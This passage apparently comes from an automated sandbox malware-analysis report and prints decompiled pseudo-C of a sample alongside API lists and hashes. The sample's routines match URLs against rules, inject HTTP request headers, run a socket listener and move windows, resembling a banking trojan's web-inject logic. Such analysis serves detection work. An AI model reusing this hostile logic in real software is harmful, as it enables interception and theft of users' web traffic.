    • WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 00404E3E
    • CloseHandle.KERNEL32(?), ref: 00404E4E
    • CloseHandle.KERNEL32(?), ref: 00404E54
    • SystemParametersInfoW.USER32(00001003,00000000,00000000,00000000), ref: 00404E63
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWaitclosesocketconnectsetsockoptsocket
    • String ID:
    • API String ID: 1240616959-0
    • Opcode ID: 08446fca2da731aee2e5a9d89ad29eb97459b05071a3faf713fe6440683d49f6
    • Instruction ID: 646031c6c670183ebd8a368c66c6c1512d7abbe41db1ba90d109c3e452f8bd97
    • Opcode Fuzzy Hash: 08446fca2da731aee2e5a9d89ad29eb97459b05071a3faf713fe6440683d49f6
    • Instruction Fuzzy Hash: DD61B3B00083459FD720EF65C844E9FBBE8AFC5704F04492EF694A72A1D778D845CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041BD84(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
    				intOrPtr _v16;
    				signed char* _v20;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				char _v76;
    				char _v104;
    				signed int _v116;
    				signed int _v120;
    				signed int _v124;
    				signed int _v125;
    				char _v128;
    				char _v136;
    				intOrPtr _v172;
    				char _v173;
    				signed int _v176;
    				intOrPtr _v180;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed char _t85;
    				signed int _t88;
    				void* _t92;
    				void* _t96;
    				void* _t100;
    				signed int _t107;
    				signed char* _t119;
    				signed int _t120;
    				struct _CRITICAL_SECTION* _t126;
    				char* _t138;
    				char* _t139;
    				char* _t140;
    				signed int _t142;
    				signed int _t148;
    
    				_v120 = _v120 | 0xffffffff;
    				if(E0041BC69( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
    					L23:
    					E00419364( &_v76);
    					return _v120;
    				}
    				_t85 = E00418A36( &_v76);
    				_v120 = _t85;
    				if((1 & _t85) == 0) {
    					__eflags = _t85 & 0x00000002;
    					if((_t85 & 0x00000002) == 0) {
    						_t126 = 0x423df4;
    						L18:
    						__eflags = _v116 & 0x00000004;
    						if((_v116 & 0x00000004) == 0) {
    							goto L23;
    						}
    						 *_a8 = _v40;
    						 *_a12 = _v36;
    						EnterCriticalSection(_t126);
    						_t146 = _a4;
    						_t88 = E0041B2EB(_a4);
    						__eflags = _t88 - 0xffffffff;
    						if(_t88 != 0xffffffff) {
    							L21:
    							_t148 = _t88 * 0x24;
    							__eflags = _t148;
    							E004119C1( *((intOrPtr*)(_t148 +  *0x423d8c + 8)));
    							 *((intOrPtr*)(_t148 +  *0x423d8c + 8)) = _v44;
    							L22:
    							LeaveCriticalSection(_t126);
    							goto L23;
    						}
    						_t88 = E0041B311(_t88, _t146);
    						__eflags = _t88 - 0xffffffff;
    						if(_t88 == 0xffffffff) {
    							goto L22;
    						}
    						goto L21;
    					}
    					_v124 = _v124 & 0x00000000;
    					_v125 = 1;
    					__eflags = _v16 - 1;
    					if(_v16 != 1) {
    						L9:
    						_t138 =  &_v104;
    						_t92 = 0x21;
    						E00419D9D(_t92, _t138);
    						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
    						_t139 =  &_v128;
    						_t96 = 0x22;
    						E00419D9D(_t96, _t139);
    						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
    						_t140 =  &_v136;
    						_t100 = 0x23;
    						E00419D9D(_t100, _t140);
    						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
    						L10:
    						_t126 = 0x423df4;
    						EnterCriticalSection(0x423df4);
    						__eflags = _v173;
    						if(_v173 == 0) {
    							L14:
    							E004193CE(_v64, _v68);
    							__eflags = _v176;
    							if(_v176 != 0) {
    								E0041364E(_v172);
    							}
    							L16:
    							LeaveCriticalSection(_t126);
    							goto L18;
    						}
    						_t150 = _a4;
    						_t107 = E0041B2EB(_a4);
    						__eflags = _t107 - 0xffffffff;
    						if(_t107 != 0xffffffff) {
    							L13:
    							_t142 = _t107 * 0x24;
    							E004193CE( *((intOrPtr*)( *0x423d8c + _t142 + 0x10)),  *((intOrPtr*)( *0x423d8c + _t142 + 0xc)));
    							E004119C1( *(_t142 +  *0x423d8c + 0x14));
    							 *(_t142 +  *0x423d8c + 0x14) =  *(_t142 +  *0x423d8c + 0x14) & 0x00000000;
    							 *(_t142 +  *0x423d8c + 0x1c) =  *(_t142 +  *0x423d8c + 0x1c) & 0x00000000;
    							 *(_t142 +  *0x423d8c + 0x18) =  *(_t142 +  *0x423d8c + 0x18) | 0xffffffff;
    							 *((intOrPtr*)(_t142 +  *0x423d8c + 0xc)) = _v76;
    							 *((intOrPtr*)(_t142 +  *0x423d8c + 0x10)) = _v72;
    							 *((intOrPtr*)(_t142 +  *0x423d8c + 0x20)) = _v180;
    							goto L16;
    						}
    						_t107 = E0041B311(_t107, _t150);
    						__eflags = _t107 - 0xffffffff;
    						if(_t107 == 0xffffffff) {
    							goto L14;
    						}
    						goto L13;
    					}
    					_t119 = _v20;
    					__eflags =  *_t119 & 0x00000003;
    					if(( *_t119 & 0x00000003) == 0) {
    						goto L9;
    					}
    					_t120 = E00419629(_t119,  &_v76);
    					_v124 = _t120;
    					__eflags = _t120;
    					if(_t120 != 0) {
    						_v120 = 1;
    					} else {
    						_v125 = _t120;
    					}
    					goto L10;
    				} else {
    					SetLastError(0x2f78);
    					_v120 = _v120 & 0x00000000;
    					goto L23;
    				}
    			}

    APIs
      • Part of subcall function 00418A36: EnterCriticalSection.KERNEL32(00423C6C,-00422A24,00000000,00422A08), ref: 00418A51
      • Part of subcall function 00418A36: LeaveCriticalSection.KERNEL32(00423C6C), ref: 00418AD4
    • SetLastError.KERNEL32(00002F78,?), ref: 0041BDCB
    • EnterCriticalSection.KERNEL32(00423DF4), ref: 0041BE72
    • LeaveCriticalSection.KERNEL32(00423DF4,?), ref: 0041BF28
    • EnterCriticalSection.KERNEL32(00423DF4,?), ref: 0041BF4F
    • LeaveCriticalSection.KERNEL32(00423DF4,?), ref: 0041BF8F
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$ErrorLast
    • String ID:
    • API String ID: 486337731-0
    • Opcode ID: d7dcdf860aeddf9c22bfd593f377fa0d4760d4006f883135a9b5284ffcf21345
    • Instruction ID: fd6646fdee0a2a48310b94ac3a45c11e5847c2a65a978d3a44bd755c81b522d0
    • Opcode Fuzzy Hash: d7dcdf860aeddf9c22bfd593f377fa0d4760d4006f883135a9b5284ffcf21345
    • Instruction Fuzzy Hash: 3A518130614301DBC721DF29DC85A9ABBE5FB45368F104A1EF960972B1C738ED96CB89
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0041D5CB(void* __ecx, void* __eflags) {
    				intOrPtr _v74;
    				signed int _v78;
    				char _v124;
    				char _v128;
    				long _v140;
    				void* _v144;
    				intOrPtr _v148;
    				void* _v152;
    				void* _v156;
    				void* _v160;
    				char _v164;
    				void* _v168;
    				signed int _v172;
    				long _v184;
    				void* __esi;
    				void* _t47;
    				long _t48;
    				void* _t49;
    				void* _t55;
    				long _t56;
    				long _t57;
    				long _t59;
    				intOrPtr _t64;
    				long _t65;
    				long _t69;
    				void* _t72;
    				long _t77;
    				signed int _t83;
    				intOrPtr* _t85;
    				signed int _t94;
    				long _t97;
    				signed int _t98;
    				void* _t100;
    
    				_t100 = (_t98 & 0xfffffff8) - 0xac;
    				_t83 = 2;
    				_t47 = E0040634D(__ecx, __eflags, 0x743c152e, _t83);
    				_v156 = _t47;
    				if(_t47 != 0) {
    					_t48 = E00406473();
    					__eflags = _t48;
    					if(_t48 == 0) {
    						L26:
    						E00415194(_v148);
    						_t49 = 0;
    						__eflags = 0;
    						L27:
    						return _t49;
    					}
    					E00419C2A(__ecx,  &_v124);
    					_t87 = _v78;
    					_t94 = E0041D476( &_v160, _v78,  &_v168) & 0x0000ffff;
    					__eflags = _t94;
    					if(_t94 != 0) {
    						L7:
    						__eflags = _t94 - _v74;
    						if(_t94 != _v74) {
    							E00419CE5( &_v124);
    							_v78 = _t94;
    							E00419D3D( &_v128);
    						}
    						_t55 =  *0x4229f4; // 0x0
    						_v144 = _t55;
    						_t56 = _v152;
    						_v172 = 1;
    						__eflags = _t56;
    						if(_t56 != 0) {
    							_v140 = _t56;
    							_v172 = _t83;
    						}
    						_t57 = _v160;
    						__eflags = _t57;
    						if(_t57 != 0) {
    							_t87 = _v172;
    							_t20 =  &_v172;
    							 *_t20 = _v172 + 1;
    							__eflags =  *_t20;
    							 *(_t100 + 0x2c + _v172 * 4) = _t57;
    						}
    						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
    						__eflags = _t59;
    						if(_t59 <= 0) {
    							L25:
    							E00414D64(_t59, _v156);
    							E00414D64(CloseHandle(_v152), _v164);
    							CloseHandle(_v160);
    							goto L26;
    						} else {
    							_t85 = __imp__#1;
    							while(1) {
    								__eflags = _t59 - _v172;
    								if(_t59 >= _v172) {
    									goto L25;
    								}
    								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
    								__eflags = _t64 - _v152;
    								if(_t64 != _v152) {
    									__eflags = _t64 - _v160;
    									if(_t64 != _v160) {
    										while(1) {
    											L23:
    											_t65 =  *_t85(_v168, 0, 0);
    											_t97 = _t65;
    											__eflags = _t97 - 0xffffffff;
    											if(_t97 == 0xffffffff) {
    												break;
    											}
    											__imp__WSAEventSelect(_t97, 0, 0);
    											_v156 = 0;
    											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
    											E00414DBC(_t87, _t97);
    											_t69 = E004133F6(0x20000, E0041D4FE, _t97);
    											__eflags = _t69;
    											if(_t69 == 0) {
    												E00414D64(_t69, _t97);
    											}
    										}
    										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
    										__eflags = _t59;
    										if(_t59 > 0) {
    											continue;
    										}
    										goto L25;
    									}
    									_t72 = _v164;
    									L20:
    									_v168 = _t72;
    									goto L23;
    								}
    								_t72 = _v156;
    								goto L20;
    							}
    							goto L25;
    						}
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						_t77 = WaitForSingleObject( *0x4229f4, 0x3e8);
    						__eflags = _t77 - 0x102;
    						if(_t77 != 0x102) {
    							break;
    						}
    						_t87 = _v74;
    						_t94 = E0041D476( &_v156, _v74,  &_v164) & 0x0000ffff;
    						__eflags = _t94;
    						if(_t94 == 0) {
    							continue;
    						}
    						break;
    					}
    					__eflags = _t94;
    					if(_t94 == 0) {
    						goto L26;
    					}
    					goto L7;
    				}
    				_t49 = 1;
    				goto L27;
    			}

    APIs
      • Part of subcall function 0040634D: CreateMutexW.KERNEL32(00422568,00000000,?,?,?,?,?), ref: 0040636E
    • WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 0041D636
    • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 0041D6C7
    • accept.WS2_32(?,00000000,00000000), ref: 0041D753
    • WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 0041D767
    • CloseHandle.KERNEL32(?), ref: 0041D788
    • CloseHandle.KERNEL32(?), ref: 0041D797
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
    • String ID:
    • API String ID: 38240579-0
    • Opcode ID: 3b62a46ca0a68407ab22b8957941c204bd33eaa751af0d31905e965f3c0b9fbf
    • Instruction ID: 40d16d01c95f5adcfcc1ddc72d123b8e1dc3e4b0d49b5107b602049f3dc79de5
    • Opcode Fuzzy Hash: 3b62a46ca0a68407ab22b8957941c204bd33eaa751af0d31905e965f3c0b9fbf
    • Instruction Fuzzy Hash: 72518CB1908201ABC720EF65DD84CAFB7E9EBC5714F10092EF5A5E31A0D7349D85CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004082BE(int __eax, long __ecx, void* __edx) {
    				struct HWND__* _v8;
    				signed short _v12;
    				int _v16;
    				long _v20;
    				struct tagPOINT _v28;
    				intOrPtr _t46;
    				int _t50;
    				signed int _t51;
    				signed int _t52;
    				signed int _t63;
    				signed int _t64;
    				signed int _t67;
    				signed int _t69;
    				signed int _t70;
    				signed int _t71;
    				int _t73;
    				void* _t74;
    				long _t78;
    				void* _t79;
    				void* _t80;
    				intOrPtr _t81;
    
    				_t80 = __edx;
    				_t73 = __eax;
    				_t78 = __ecx;
    				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
    				_t46 =  *((intOrPtr*)(_t80 + 0x10));
    				_v8 =  *((intOrPtr*)(_t46 + 0x108));
    				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
    				ReleaseMutex( *(_t80 + 0x14));
    				_t50 = GetWindowRect(_v8,  &_v28);
    				if(_t50 != 0) {
    					if(_v12 != 2) {
    						_t51 = _v12 & 0x0000ffff;
    						__eflags = _t51 - 0xd;
    						if(__eflags > 0) {
    							_t52 = _t51 - 0xe;
    							__eflags = _t52;
    							if(_t52 == 0) {
    								_v20 = _t78;
    								goto L22;
    							} else {
    								_t63 = _t52 - 1;
    								__eflags = _t63;
    								if(_t63 == 0) {
    									_v16 = _t73;
    								} else {
    									_t64 = _t63 - 1;
    									__eflags = _t64;
    									if(_t64 == 0) {
    										_v16 = _t73;
    										goto L19;
    									} else {
    										__eflags = _t64 == 1;
    										if(_t64 == 1) {
    											goto L16;
    										}
    									}
    								}
    							}
    						} else {
    							if(__eflags == 0) {
    								L11:
    								_v28.x = _t78;
    								goto L22;
    							} else {
    								_t67 = _t51;
    								__eflags = _t67;
    								if(_t67 == 0) {
    									goto L11;
    								} else {
    									_t69 = _t67;
    									__eflags = _t69;
    									if(_t69 == 0) {
    										L16:
    										_v16 = _t73;
    										goto L17;
    									} else {
    										_t70 = _t69 - 6;
    										__eflags = _t70;
    										if(_t70 == 0) {
    											L19:
    											_v28.x = _t78;
    										} else {
    											_t71 = _t70 - 1;
    											__eflags = _t71;
    											if(_t71 == 0) {
    												L17:
    												_v20 = _t78;
    											} else {
    												__eflags = _t71 == 1;
    												if(_t71 == 1) {
    													L22:
    													_v28.y = _t73;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t81 =  *((intOrPtr*)(_t80 + 0x10));
    						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
    						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
    						_v28.x = _v28.x + _t79;
    						_v28.y = _v28.y + _t74;
    						_v20 = _v20 + _t79;
    						_v16 = _v16 + _t74;
    					}
    					_t50 = IsRectEmpty( &_v28);
    					if(_t50 == 0) {
    						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
    							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
    						}
    						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
    					}
    				}
    				return _t50;
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004082D2
    • ReleaseMutex.KERNEL32(?), ref: 004082F1
    • GetWindowRect.USER32 ref: 004082FE
    • IsRectEmpty.USER32(?), ref: 00408382
    • GetWindowLongW.USER32(?,000000F0), ref: 00408391
    • GetParent.USER32(?), ref: 004083A7
    • MapWindowPoints.USER32 ref: 004083B0
    • SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 004083D4
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
    • String ID:
    • API String ID: 2634726239-0
    • Opcode ID: 4f9a52798173db80d21501c166ca2291fee5fe9989a33a06982ac7aea1bef415
    • Instruction ID: ec5075b8e71b28687eaca58ad83e0569e128089b81a41065efbf6232d05234c9
    • Opcode Fuzzy Hash: 4f9a52798173db80d21501c166ca2291fee5fe9989a33a06982ac7aea1bef415
    • Instruction Fuzzy Hash: 2A41607180060ADFCB208FA8CA499BFBBB4FB84B50F14057EE981F22A0DB759940CB55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E00418A36(intOrPtr _a4) {
    				char _v9;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v32;
    				char _v36;
    				char _v60;
    				char _v72;
    				signed int _v76;
    				char* _v80;
    				void* _v96;
    				intOrPtr _v148;
    				void* _v160;
    				char _v168;
    				char _v272;
    				char _v536;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t128;
    				intOrPtr* _t129;
    				char* _t130;
    				void* _t137;
    				void* _t140;
    				void* _t144;
    				void* _t152;
    				void* _t154;
    				char* _t156;
    				void* _t161;
    				void* _t163;
    				void* _t164;
    				void* _t167;
    				void* _t172;
    				intOrPtr _t174;
    				intOrPtr* _t176;
    				void* _t177;
    				void* _t182;
    				intOrPtr _t186;
    				intOrPtr _t187;
    				signed int _t189;
    				void* _t194;
    				void* _t197;
    				void* _t198;
    				void* _t199;
    				int _t204;
    				void* _t207;
    				signed int _t210;
    				void* _t214;
    				signed int _t217;
    				signed int _t218;
    				void* _t219;
    				void* _t224;
    				char* _t227;
    				intOrPtr _t228;
    				char* _t233;
    				char* _t236;
    				intOrPtr _t238;
    				signed int _t239;
    				intOrPtr _t240;
    				void* _t244;
    				void* _t247;
    
    				_t217 = 0;
    				_v16 = 0;
    				_v9 = 0xff;
    				EnterCriticalSection(0x423c6c);
    				_t225 =  *0x423c88;
    				if( *0x423c88 == 0 ||  *0x423c84 == 0) {
    					_t240 = _a4;
    				} else {
    					_t240 = _a4;
    					_t230 = 0;
    					if(E0041816B(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
    						_t210 = E00419EBD();
    						_v20 = _t210;
    						if(_t210 != 0) {
    							_t214 = E00418225(0, 4,  &_v20,  *0x423c84);
    							_push(_v20);
    							if(_t214 == 0) {
    								E004119C1();
    							}
    							E00419F28(_t225);
    						}
    						E004119C1( *0x423c84);
    						E004119C1( *0x423c88);
    						 *0x423c84 = _t217;
    						 *0x423c88 = _t217;
    					}
    				}
    				LeaveCriticalSection(0x423c6c);
    				_t128 =  *((intOrPtr*)(_t240 + 0x40));
    				_t254 = _t128 - _t217;
    				if(_t128 == _t217) {
    					L38:
    					if((_v16 & 0x00000001) == 0) {
    						_t187 =  *((intOrPtr*)(_t240 + 0x44));
    						_t272 = _t187 - _t217;
    						if(_t187 != _t217 && E00418426(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
    							_v16 = _v16 | 0x00000001;
    						}
    					}
    					if( *(_t240 + 0x20) >= 0x21) {
    						_t182 = 0x10;
    						E00419D9D(_t182,  &_v72);
    						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
    						if(E00411A32( &_v72, _t238, 0x21) == 0) {
    							_t186 =  *((intOrPtr*)(_t238 + 0x21));
    							if(_t186 == 0x3b || _t186 == 0) {
    								_v16 = _v16 | 0x00000010;
    							}
    						}
    					}
    					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
    					_v24 = _t217;
    					if(_t129 == _t217 ||  *_t129 == _t217) {
    						L52:
    						_t130 =  *((intOrPtr*)(_t240 + 0x34));
    						__eflags = _t130 - _t217;
    						if(_t130 == _t217) {
    							goto L60;
    						}
    						__eflags =  *_t130;
    						if( *_t130 == 0) {
    							goto L60;
    						}
    						_t167 = 0x12;
    						E00419DD3(_t167,  &_v168);
    						_t172 = E0041272F( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
    						_t247 = _t247 + 0xc;
    						goto L55;
    					} else {
    						_t176 =  *((intOrPtr*)(_t240 + 0x30));
    						if(_t176 == _t217 ||  *_t176 == _t217) {
    							goto L52;
    						} else {
    							_t177 = 0x11;
    							E00419DD3(_t177,  &_v272);
    							_push( *((intOrPtr*)(_a4 + 0x30)));
    							_t172 = E0041272F( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
    							_t247 = _t247 + 0x10;
    							L55:
    							if(_t172 > _t217) {
    								_t174 = E00412D70(_v24, _t172 + _t172);
    								if( *0x423c8c != _t174) {
    									_t64 =  &_v16;
    									 *_t64 = _v16 | 0x00000020;
    									__eflags =  *_t64;
    									 *0x423c8c = _t174;
    								} else {
    									E004119C1(_v24);
    									_v24 = _t217;
    								}
    							}
    							_t240 = _a4;
    							L60:
    							if(_v9 != 0xff) {
    								__eflags = _v9 - 1;
    								if(_v9 != 1) {
    									L67:
    									if((_v16 & 0x00000008) == 0) {
    										L93:
    										E004119C1(_v24);
    										_t218 = _v16;
    										if((_t218 & 0x00000001) == 0) {
    											if(E0041848E(_t230, _t240) != 0) {
    												_t218 = _t218 | 0x00000002;
    											}
    											if((_t218 & 0x00000010) != 0 && E00418848(_t240, _t230) != 0) {
    												_t218 = _t218 | 0x00000004;
    											}
    										}
    										return _t218;
    									}
    									_t136 =  *(_t240 + 0x28);
    									_t219 = 0;
    									if( *(_t240 + 0x28) != 0) {
    										__eflags = _v16 & 0x00000010;
    										if((_v16 & 0x00000010) == 0) {
    											__eflags =  *(_t240 + 0x20);
    											if( *(_t240 + 0x20) != 0) {
    												L92:
    												_v16 = _v16 & 0xfffffff7;
    												goto L93;
    											}
    											_t233 =  &_v36;
    											_t137 = 0xc;
    											E00419D9D(_t137, _t233);
    											_push(_t233);
    											_push(9);
    											L81:
    											_pop(_t140);
    											_v20 = E00411E1F(_t140);
    											L82:
    											if(_v20 == 0) {
    												goto L92;
    											}
    											E0041D15D( &_v32);
    											_t144 = E00411C01( *(_t240 + 0xc), 0,  *(_t240 + 8));
    											_t235 = _t144;
    											if(_t144 != 0) {
    												_t230 = 0x3c;
    												E00411A74( &_v160,  &_v160, 0, _t230);
    												_v160 = _t230;
    												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
    													_t152 = 0xa;
    													E00419DD3(_t152,  &_v272);
    													_t154 = 0xd;
    													E00419DD3(_t154,  &_v60);
    													_t227 =  *(_a4 + 0x10);
    													_t156 = 0x403490;
    													_t230 =  ==  ? 0x403490 : _v24;
    													_t244 =  ==  ? 0x403490 : _v32;
    													if(_t227 == 0) {
    														_t227 = "-";
    													}
    													if((_v16 & 0x00000001) != 0) {
    														_t156 =  &_v60;
    													}
    													_push(_v20);
    													_push(_t230);
    													_push(_t244);
    													_push(_t227);
    													_push(_t156);
    													_t161 = E0040BA61(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
    													_t240 = _a4;
    													_t219 = _t161;
    												}
    												E004119C1(_t235);
    											}
    											E004119C1(_v32);
    											E004119C1(_v20);
    											if(_t219 != 0) {
    												goto L93;
    											} else {
    												goto L92;
    											}
    										}
    										_t230 = E00411E1F(_t136,  *((intOrPtr*)(_t240 + 0x24)));
    										_v20 = _t230;
    										__eflags = _t230;
    										if(_t230 == 0) {
    											goto L92;
    										}
    										_t163 = 0;
    										__eflags =  *(_t240 + 0x28);
    										if( *(_t240 + 0x28) <= 0) {
    											goto L82;
    										} else {
    											goto L73;
    										}
    										do {
    											L73:
    											_t228 =  *((intOrPtr*)(_t163 + _t230));
    											__eflags = _t228 - 0x26;
    											if(_t228 != 0x26) {
    												__eflags = _t228 - 0x2b;
    												if(_t228 == 0x2b) {
    													 *((char*)(_t163 + _t230)) = 0x20;
    												}
    											} else {
    												 *((char*)(_t163 + _t230)) = 0xa;
    											}
    											_t163 = _t163 + 1;
    											__eflags = _t163 -  *(_t240 + 0x28);
    										} while (_t163 <  *(_t240 + 0x28));
    										goto L82;
    									}
    									_t236 =  &_v36;
    									_t164 = 0xb;
    									E00419D9D(_t164, _t236);
    									_push(_t236);
    									_push(7);
    									goto L81;
    								}
    								L66:
    								_v16 = _v16 | 0x00000008;
    								goto L67;
    							}
    							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
    								if((_v16 & 0x00000020) == 0) {
    									goto L67;
    								}
    							}
    							goto L66;
    						}
    					}
    				}
    				_t189 = E0041752D( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
    				_t225 = _v32;
    				_v20 = _t189;
    				if(E00412853(_t189, _v32) == 0) {
    					L37:
    					E004119C1(_v20);
    					_t217 = 0;
    					goto L38;
    				} else {
    					_t239 = _v20;
    					do {
    						_t225 = _t239 + 1;
    						if( *_t225 == 0) {
    							goto L36;
    						}
    						_t194 =  *_t239;
    						if(_t194 == 0x21) {
    							L22:
    							_t239 = _t225;
    							L23:
    							_t230 = 0;
    							_t225 = _t239;
    							if(E0041816B(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
    								goto L36;
    							}
    							_t197 = _t224;
    							if(_t197 == 0) {
    								_v9 = 0;
    								L35:
    								if(_t224 != 2) {
    									goto L37;
    								}
    								goto L36;
    							}
    							_t198 = _t197 - 1;
    							if(_t198 == 0) {
    								L30:
    								_v9 = 1;
    								goto L35;
    							}
    							_t199 = _t198 - 1;
    							if(_t199 == 0) {
    								_t230 = 0x3c;
    								E00411A74( &_v96,  &_v96, 0, 0);
    								_v80 =  &_v536;
    								_v96 = 0;
    								_v76 = 0x103;
    								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
    								__eflags = _t204 - 1;
    								if(_t204 == 1) {
    									__eflags = _v76;
    									if(_v76 > 0) {
    										E0041D117( &_v536);
    									}
    								}
    								goto L35;
    							}
    							_t207 = _t199 - 1;
    							if(_t207 == 0 || _t207 == 1) {
    								_v16 = _v16 | 0x00000001;
    								goto L30;
    							} else {
    								goto L35;
    							}
    						}
    						if(_t194 == 0x2d) {
    							goto L22;
    						}
    						if(_t194 == 0x40) {
    							goto L22;
    						}
    						if(_t194 == 0x5e) {
    							_t224 = 4;
    							goto L22;
    						} else {
    							_t224 = 0;
    							goto L23;
    						}
    						L36:
    						_t239 = E00412891(_t239, 1);
    					} while (_t239 != 0);
    					goto L37;
    				}
    			}

    APIs
    • EnterCriticalSection.KERNEL32(00423C6C,-00422A24,00000000,00422A08), ref: 00418A51
    • LeaveCriticalSection.KERNEL32(00423C6C), ref: 00418AD4
    • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00418B9F
    • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00418DD9
      • Part of subcall function 00419EBD: CreateMutexW.KERNEL32(00422568,00000000,00423E10,?,?,?,00405456), ref: 00419EE5
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
    • String ID: $l<B
    • API String ID: 4018265435-2187299703
    • Opcode ID: c02e658eb0cb0e327896a590a47dbdb3e29216e743d850eb6e3f0981638939b0
    • Instruction ID: 669cc296082537d21308f37a95843b351e459804bcf346d4df2b977e18b60845
    • Opcode Fuzzy Hash: c02e658eb0cb0e327896a590a47dbdb3e29216e743d850eb6e3f0981638939b0
    • Instruction Fuzzy Hash: 67D1BE71A00309AEDF219BA1C845BEFBBB5AF01344F04446FE951A72A1DB78ADC1CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00406388(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
    				char _v5;
    				void _v12;
    				intOrPtr _t25;
    				void _t26;
    				signed int _t29;
    				void _t43;
    				void* _t51;
    				void* _t52;
    
    				_t52 = __esi;
    				_t51 = __edi;
